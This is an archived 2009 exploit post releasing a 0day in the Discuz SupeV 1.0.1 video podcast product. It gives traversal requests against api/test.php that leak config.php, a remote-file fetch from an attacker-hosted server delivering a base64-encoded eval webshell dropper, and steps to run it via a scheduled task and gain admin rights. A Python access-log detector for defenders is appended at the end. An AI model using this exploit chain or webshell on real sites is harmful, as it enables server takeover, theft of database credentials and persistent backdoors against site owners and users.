SupeV 1.0.1 0day vulnerability - Vulnerability warning - Black Bar Safety Net

2009-02-28T00:00:00
ID MYHACK58:62200922345
Type myhack58
Reporter Anonymous
Modified 2009-02-28T00:00:00

Description

Source: WEB Security manual

Thanks to '&waste for the submission.

Hello everyone, I'm nameless

Today I am releasing a 0day in the Discuz product "video podcast SupeV 1.0.1".

Vulnerable file: test.php in the api directory

Let's look directly at the code:

$str = file_get_contents( $thumb ); // line 18: file_get_contents() reads the content of the file named by the $thumb parameter; note that it can also read a remote file
$path = "." . getthumb_path( $vid ); // line 19: builds the path from the $vid parameter
$opt_big = array(
    "targetfile" => $path . ".jpg",
    "attach" => $attach['attach'],
    "ext" => $attach['extension'],
    "ratio" => false,
    "width" => THUMB_BIG_WIDTH,
    "height" => THUMB_BIG_HEIGHT
); // lines 24 to 39 define the $opt_big and $opt_small arrays
@sf_copy( $opt_big['targetfile'], $opt_small['targetfile'] ); // line 40: the copy starts; note that the targetfile of the $opt_big array is copied to the targetfile of the $opt_small array

That is how the vulnerability arises. Send a GET request directly:

api/test.php?thumb=../config.php&vid=../../1

This copies config.php to 1.jpg in the root directory.

This gives you the site's configuration file. Connect with phpMyAdmin; if it is a root connection, export a shell directly. Anyone who does not know how should look up the relevant articles; it is not described here.

If it is not root, just register an account, connect, and change that user's admgid to 1 in the sv_members table.

Next, getting a shell from the admin background.

As shown in the test.php code above, file_get_contents() can read a remote file, which is then written into the site directory:

api/test.php?thumb=http://your address space/test.txt&vid=../../../../inc/crons/1

This writes it to inc/crons/1.jpg.

Content of test.txt:

<? php fputs(fopen("111.php","w"),base64_decode("PD9ldmFsKCRfUE9TVFtjbWRdKTs/Pg=="));?>

Its effect is to generate 111.php in the current directory, containing the LANKER one-liner with the password cmd.

Why write it here? As you know, once in the admin background, click the auxiliary tools at the top and create a new scheduled task.

On submission, the content of inc/crons/1.jpg is executed and 111.php is generated in the root directory, containing the LANKER one-liner with the password cmd. Once you have the shell, remember to delete the scheduled task, otherwise the site will not open.

If you cannot get it to work, contact me. Contact QQ: 57112848 cainiaokunmm@163.com

Powered by SupeV 1.0.1 exploit

Found by: nameless
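For defenders, both request shapes described above leave a recognisable trace in web server access logs. The following is an added example, not code from the original post or from SupeV: it flags requests to api/test.php whose thumb parameter names a remote or wrapper source or climbs out of the directory, or whose vid parameter contains traversal, including percent-encoded and double-encoded forms. The log lines, IP addresses, host.example and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)  # http:, ftp:, php:, data:

# Constructed access-log lines (combined format); hosts and IPs are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Feb/2009:10:00:01 +0000] "GET /api/test.php?thumb=../config.php&vid=../../1 HTTP/1.1" 200 0',
    '203.0.113.7 - - [28/Feb/2009:10:02:09 +0000] "GET /api/test.php?thumb=http%3A%2F%2Fhost.example%2Ftest.txt&vid=..%2F..%2F..%2F..%2Finc%2Fcrons%2F1 HTTP/1.1" 200 0',
    '198.51.100.4 - - [28/Feb/2009:10:05:44 +0000] "GET /api/test.php?thumb=%252e%252e%252fconfig.php&vid=12 HTTP/1.1" 200 0',
    '198.51.100.9 - - [28/Feb/2009:10:06:12 +0000] "GET /api/test.php?thumb=upload/12.jpg&vid=12 HTTP/1.1" 200 0',
]

def decode(value, rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    return ".." in value.replace("\\", "/").split("/")  # any '..' path segment

def classify(log_line):
    """Return the findings for one access-log line ([] if nothing matches)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not decode(url.path).lower().endswith("/api/test.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    for raw in params.get("thumb", []):
        thumb = decode(raw).strip()
        if SCHEME_RE.match(thumb):
            findings.append("thumb: remote or wrapper source")
        elif has_traversal(thumb):
            findings.append("thumb: path traversal")
    if any(has_traversal(decode(v)) for v in params.get("vid", [])):
        findings.append("vid: path traversal")
    return findings

if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, 1):
        print(number, classify(line) or "clean")
```

A hit on either parameter is worth following up by checking the web root and inc/crons for unexpected .jpg or .php files and by reviewing the scheduled-task list in the admin background.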